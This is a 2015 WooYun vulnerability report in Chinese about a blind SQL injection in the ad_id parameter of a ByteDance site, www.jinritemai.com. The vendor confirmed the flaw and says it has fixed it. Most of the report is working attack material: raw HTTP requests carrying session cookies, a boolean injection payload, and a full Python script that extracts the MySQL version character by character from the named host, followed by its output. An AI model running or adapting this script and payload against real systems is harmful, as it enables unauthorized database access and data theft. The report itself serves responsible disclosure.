当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103029

漏洞标题:今日头条(某站)Mysql注入漏洞<附验证脚本>

相关厂商:字节跳动

漏洞作者: BMa

提交时间:2015-03-22 15:42

修复时间:2015-05-06 16:34

公开时间:2015-05-06 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-22: 细节已通知厂商并且等待厂商处理中
2015-03-22: 厂商已经确认,细节仅向厂商公开
2015-04-01: 细节向核心白帽子及相关领域专家公开
2015-04-11: 细节向普通白帽子公开
2015-04-21: 细节向实习白帽子公开
2015-05-06: 细节向公众公开

简要描述:

今日头条(某站)Mysql注入漏洞<附验证脚本>

详细说明:

Site: www.jinritemai.com
登录后POST如下数据包:

POST /brand/ajaxListIndex HTTP/1.1
Host: www.jinritemai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=r11nlj7i7rq0qm5j67q1v7b2m1; SERVERID=095dff632a5f554d948297d59eb3497e|1426903249|1426903211; StatComcurrent_page_id=112827337520150321; WwwComschema=web; WwwComuser_info=YTo0OntzOjc6InVzZXJfaWQiO3M6ODoiMjE2NTMzMjciO3M6MzoiZW52IjtzOjY6Im9ubGluZSI7czoxMToiY3JlYXRlX3RpbWUiO2k6MTQyNjkwMzI0NDtzOjk6InVzZXJfY29kZSI7czozMjoiMDg4NDhmNTYwOWI3NGQwOGYyM2Q5NmZjZTUwODZkYTAiO30%3D; WwwComuser_id=21653327
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
data: categoryid=0&page=0&ad_id=&changecategory=0


问题参数:ad_id

1.jpg


SQLmap确认存在安全隐患

2.jpg


尝试手工注入:可以根据返回值大小进行盲注

3.png


4.png


POST /brand/ajaxListIndex HTTP/1.1
Host: www.jinritemai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=r11nlj7i7rq0qm5j67q1v7b2m1; SERVERID=095dff632a5f554d948297d59eb3497e|1426905819|1426903211; StatComcurrent_page_id=112827337520150321; WwwComschema=web; WwwComuser_info=YTo0OntzOjc6InVzZXJfaWQiO3M6ODoiMjE2NTMzMjciO3M6MzoiZW52IjtzOjY6Im9ubGluZSI7czoxMToiY3JlYXRlX3RpbWUiO2k6MTQyNjkwMzI0NDtzOjk6InVzZXJfY29kZSI7czozMjoiMDg4NDhmNTYwOWI3NGQwOGYyM2Q5NmZjZTUwODZkYTAiO30%3D; WwwComuser_id=21653327
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
categoryid=0&page=0&ad_id=1 || ascii(left(version(),1))=53&changecategory=0


python脚本:

#!/usr/bin/python
#coding:utf_8
import httplib
import time
import urllib
import sys
import random
headers = {"Content-type": "application/x-www-form-urlencoded",  
           'Accept-Language':'zh-CN,zh;q=0.8',  
           'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0)',  
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",  
           "Connection": "close",  
           "Cache-Control": "no-cache"}
post_data = {"categoryid":'0',
             "page":'0',
             "changecategory":'0'
             }
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
base_url = "/brand/ajaxListIndex"
user = ''
def sql():
    
    global post_data
    global user
    
    cookie = raw_input("pls input your cookie:")
    headers["Cookie"] = cookie
    
    for i in range(1,15):
        for payload in payloads:
            getuser = "1 || ASCII(MID(version(),%d,1)) = %d" % (i,ord(payload))            
            post_data["ad_id"] = getuser   
    
            postdata = urllib.urlencode(post_data)
            conn = httplib.HTTPConnection('www.jinritemai.com',80,timeout=60)
            conn.request('POST', base_url, postdata, headers)
            response = conn.getresponse()
            html_contet = response.read().decode('utf-8')
            html_contet_len = len(html_contet)
            print html_contet_len
#            print html_contet
    
            if  html_contet_len > 14000:
                user += payload
                sys.stdout.write('\r[In Progress' + user)
                sys.stdout.flush()
                break
            else:
                print 'WAITING...' + str(random.randint(1,100))
if __name__ == "__main__":
    sql()
    print '\n[Done]MySQL version is ' + user
    print time.strftime('%H:%M:%S', time.localtime())


5.png


[Done]MySQL version is 5.6.16log

6.png


[Done]MySQL user is 10.16.759.30567

漏洞证明:

需要的cookie:
PHPSESSID=r11nlj7i7rq0qm5j67q1v7b2m1; SERVERID=095dff632a5f554d948297d59eb3497e|1426905819|1426903211; StatComcurrent_page_id=112827337520150321; WwwComschema=web; WwwComuser_info=YTo0OntzOjc6InVzZXJfaWQiO3M6ODoiMjE2NTMzMjciO3M6MzoiZW52IjtzOjY6Im9ubGluZSI7czoxMToiY3JlYXRlX3RpbWUiO2k6MTQyNjkwMzI0NDtzOjk6InVzZXJfY29kZSI7czozMjoiMDg4NDhmNTYwOWI3NGQwOGYyM2Q5NmZjZTUwODZkYTAiO30%3D; WwwComuser_id=21653327
点到为止,不触碰数据

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-22 16:33

厂商回复:

确认漏洞。已修复。

最新状态:

暂无